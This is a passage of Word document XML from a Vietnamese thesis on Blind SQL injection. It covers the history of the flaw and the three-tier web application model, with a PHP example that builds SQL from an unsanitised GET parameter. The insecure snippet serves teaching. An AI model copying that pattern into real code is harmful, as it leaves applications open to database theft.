            </w:r>
          </w:p>
          <w:p w:rsidR="002C6428" w:rsidRDefault="002C6428" w:rsidP="00E14CFD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="002C6428" w:rsidRDefault="002C6428" w:rsidP="00E14CFD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="002C6428" w:rsidRDefault="002C6428" w:rsidP="00E14CFD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="002C6428" w:rsidRDefault="002C6428" w:rsidP="00E14CFD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="002C6428" w:rsidRDefault="002C6428" w:rsidP="00E14CFD">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Hà Bách Nam</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00A23DF1" w:rsidRDefault="00A23DF1" w:rsidP="00C93A9C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:sectPr w:rsidR="00A23DF1" w:rsidSect="006A2294">
          <w:headerReference w:type="default" r:id="rId9"/>
          <w:type w:val="continuous"/>
          <w:pgSz w:w="11907" w:h="16840" w:code="9"/>
          <w:pgMar w:top="1701" w:right="1134" w:bottom="1701" w:left="1985" w:header="0" w:footer="720" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="720"/>
          <w:formProt w:val="0"/>
          <w:docGrid w:linePitch="381" w:charSpace="-14337"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C6428" w:rsidRDefault="002C6428">
      <w:pPr>
        <w:suppressAutoHyphens w:val="0"/>
        <w:spacing w:line="252" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00217848">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc459822484"/>
      <w:r w:rsidRPr="005D3C52">
        <w:lastRenderedPageBreak/>
        <w:t>Tấn công Blind SQL injection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lỗ hổng SQL injecton đã tồn tại ngay từ lần đầu tiên ứng dụng web được kết nối với cơ sở dữ liệu. Tuy nhiên, Rain Forest Puppy được coi là người đ</w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ầ</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>u tiên có công bố rộng rãi về lỗ hổng này. Vào ngày giáng sinh năm 1998, Rain Forest Puppy đã viết bài báo “NT Web Technology Vulnerabilities” trên Phrack (</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:anchor="article" w:history="1">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>www.phrack.com/issues.html?issue=54&amp;id=8#article</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>), một chuyên trang dành cho các hacker trên thế giới. Tác giả cũng cung cấp một bài hướng dẫn tấ</w:t>
      </w:r>
      <w:r w:rsidR="00DB3DB2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">n công SQL injection </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">tên “How I hacked PacketStorm” tại www.wiretrip.net/rfp/txt/rfp2k01.txt  vào đầu những năm 2000. Kể từ đây, nhiều nhà nghiên cứu trên thế giới đã bắt đầu phát triển các kỹ thuật tấn công, khai thác lỗ hổng SQL injection. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="000A795D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc459822485"/>
      <w:r w:rsidRPr="005D3C52">
        <w:t>Lỗ hổng SQL injection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Trong nhiề</w:t>
      </w:r>
      <w:r w:rsidR="005B031B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>u năm qua ngày càng có nhiều những bài báo, nghiên cứu về l</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ỗ hổng SQL injection</w:t>
      </w:r>
      <w:r w:rsidR="005B031B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">. Đó thường là những bài viết về kinh nghiệm, cách khai thác lỗ hổng này. SQL injection là một trong những lỗ hổng nguy hiểm nhất, ảnh hưởng nghiêm trọng hoạt động kinh doanh, nghiệp vụ của tổ chức. </w:t>
      </w:r>
      <w:r w:rsidR="0014540A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lỗ hổng</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> cho phép kẻ tấn công tiếp xúc với những thông tin cực kỳ quan trọng như: thông tin tài khoản, thông tin email, thông tin thẻ tín dụng. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong phần này </w:t>
      </w:r>
      <w:r w:rsidR="00550B65">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>luận văn</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sẽ xem xét nguyên nhân của lỗ hổng. Bắt đầu bằng cái nhìn tổng quan về cấu trúc và hoạt động của ứng dụng web, từ đó cung cấp hiểu biết về cách mà lỗ hổng SQL injection xảy ra dựa trên phân tích mã nguồn của ứng dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="000A795D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc459822486"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nguyên tắc hoạt động của ứng dụng web sử dụng cơ sở dữ liệu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Đại đa số</w:t>
      </w:r>
      <w:r w:rsidR="000B5547">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> mọi người</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> sử dụng các ứng dụng web trong cuộc sống hằng ngày, như là một phần trong cuộc sống như: duyệt email, mua hàng trực tuyến, đọc một tin tức mình quan tâm. Ứng dụng web cũng có đủ loại nội d</w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ng, với đủ loại kích thước khác nhau. Mặc dù khác nhau, đa dạng như vậy nhưng các ứng dụng web lại có một điểm giống nhau cơ bản. Đó chính là cách mà ứng dụng web tương tác. Thông thường, đó chính là cơ sở dữ liệu (CSDL).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Ứng dụng web sử dụng cơ sở dữ liệu rất phổ biến ngày nay. Thông thường bao gồm một CSDL phía back-end và một trang web chứa các đoạn mã server-side trên máy chủ, có khả năng trích xuất các dữ liệu từ CSDL dựa trên các hành vi, tác động khác nhau của người d</w:t>
      </w:r>
      <w:r w:rsidR="00F86F13">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ù</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>ng. Một trong những ví dụ rõ nhất là trang thương mại điện tử: Các thông tin về sản phẩm như: tên, giá, số lượng… được lưu trữ trong CSDL. Tùy thuộc vào loại sản phẩ</w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>m mà người dùng</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> muốn xem, ứng dụng sẽ trả về cho </w:t>
      </w:r>
      <w:r w:rsidR="0009792B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>người dùng</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> thông tin sản phẩm tương ứng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Một ứng dụng web cơ bản gồm 3 lớp (three tiers): Lớp trình bày (Presentation Tier) là trình duyệt, hoặc bộ engine hiển thị, Lớp logic (Logic Tier) là ngôn ngữ lập trình hoạt động phía máy chủ</w:t>
      </w:r>
      <w:r w:rsidR="008E1FF3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> như C#, ASP, .NET, PHP, JSP…</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lớp lưu trữ (Storage Tier) là các hệ quản trị CSDL như Microsoft SQL Server, MySQL, Oracle… Trình duyệt web ở lớp trình bày gửi yêu cầu tới lớp trung gian – lớp logic, tạo ra các yêu cầu truy vấn hoặc cập nhật vào CSDL (lớp lưu trữ).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>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Để xem tất cả các sản phẩm có giá thấp hơn 100$, người mua sẽ sử dụng URL sau:  </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidRPr="003633C3">
          <w:t>http://www.victim.com/products.php?val=100</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>. Đoạn mã PHP dưới đây sẽ minh họa các mà đầu vào từ người dùng (tham số val) được truyền vào và tạo ra một câu truy vấn SQL động. Đoạn mã sẽ được thực thi khi người dùng gọi t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 xml:space="preserve">$query = "SELECT </w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:hAnsi="Cambria Math" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>∗</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> FROM Products WHERE Price &lt; '$_GET["val"]' "."ORDER BY ProductDescription";</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iterate through the record set</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>while($row = mysql_fetch_array($result, MYSQL_ASSOC))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts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ab/>
              <w:t>// display the results to the browser</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
              <w:t>echo "Description : {$row['ProductDescription']} &lt;br&gt;".</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
              <w:t>"Product ID : {$row['ProductID']} &lt;br&gt;".</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
              <w:t>"Price : {$row['Price']} &lt;br&gt;&lt;br&gt;";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Đoạn </w:t>
      </w:r>
      <w:r w:rsidR="008E1FF3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>mã nguồn</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> trên minh họa rõ quá trình PHP script tạo ra câu truy vấn. Câu truy vấn sẽ trả về tất cả sản phẩm có giá thấp hơn 100$ trong CSDL, những sản phẩm này sẽ được hiển thị trên trình duyệt web của người dùng. Về nguyên tắc, tất cả các phương pháp làm việc của ứng dụng web đều hoạt động giống như cách này, hoặc một hình thức tương đương nhằm tạo ra câu truy vấ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78"/>
      </w:tblGrid>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidTr="00876FFE">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>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FROM Products</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">WHERE </w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Price &lt;’100.00’</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ORDER BY ProductDescription;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F022BA" w:rsidRDefault="00F022BA" w:rsidP="003308DA">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00776D95" w:rsidRDefault="003F7098" w:rsidP="00776D95">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35469492" wp14:editId="6FBE7044">
            <wp:extent cx="5257800" cy="2137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257800" cy="2137410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="00776D95" w:rsidRDefault="00776D95" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc459819428"/>
      <w:r w:rsidRPr="00776D95">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00776D95">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003F7098" w:rsidRPr="00776D95">
        <w:t>Mô hình ba lớp đơn giản trong ứng dụng web.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Lớp trình bày là lớp cao nhất của ứng dụng, nó hiển thị các thông tin liên quan</w:t>
      </w:r>
      <w:r w:rsidR="00DB3DB2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">các dịch vụ như hàng hóa, nội dung giỏ hàng, và giao tiếp với những lớp khác để trả  kết quả lên trình duyệt. Tiếp theo lớp trình bày là lớp logic, thực hiện các chức năng của ứng dụng bằng các xử lý chi tiết. Lớp lưu trữ gồm các máy chủ CSDL, dữ liệu sẽ được lưu trữ và lấy ra tại đây. Điều này giúp cho dữ </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">liệu độc lập với ứng dụng và các hoạt động nghiệp vụ. Một nguyên tắc cơ bản là lớp trình bày không bao giờ liên kết trực tiếp với lớp dữ liệu, mà phải đi qua lớp logic trung gian. Khi người dùng sử dụng trình duyệt web truy cập vào URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidRPr="005D3C52">
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:t>http://www.victim.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, máy chủ web server sẽ tải file kịch bản từ file hệ thống, chuyển đến scripting engine để phân tích và thực thi. Đoạn script sẽ thực hiện mở kết nối đến lớp lưu trữ - CSDL qua Database Connector để thực hiện câu truy vấn SQL. CSDL trả về kết quả truy vấn cho Database Connector, chuyển đến cho scripting engine (lớp logic). Lớp logic sẽ thực hiện các ứng dụng, nghiệp vụ tương ứng với kết quả truy vấn SQL trước khi trả về trang Web dạng HTML cho trình duyệt web của người dùng. Trình duyệt web sẽ hiển thị HTML dưới dạng hình ảnh, đồ họa sinh động. Toàn bộ quá trình thực thi chỉ trong khoảng vài giây và hoàn toàn trong suốt với người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>Mô hình ba lớp không có tính mở rộng, do đó trong những năm gần đây mô hình này đang được đánh giá lại và một mô hình mới được xây dựng có tính mở rộng và bảo trì được xây dựng: mô hình n-lớp. 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Các máy chủ có thể sử dụng nhiều loại ngôn ngữ</w:t>
      </w:r>
      <w:r w:rsidR="003633C3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
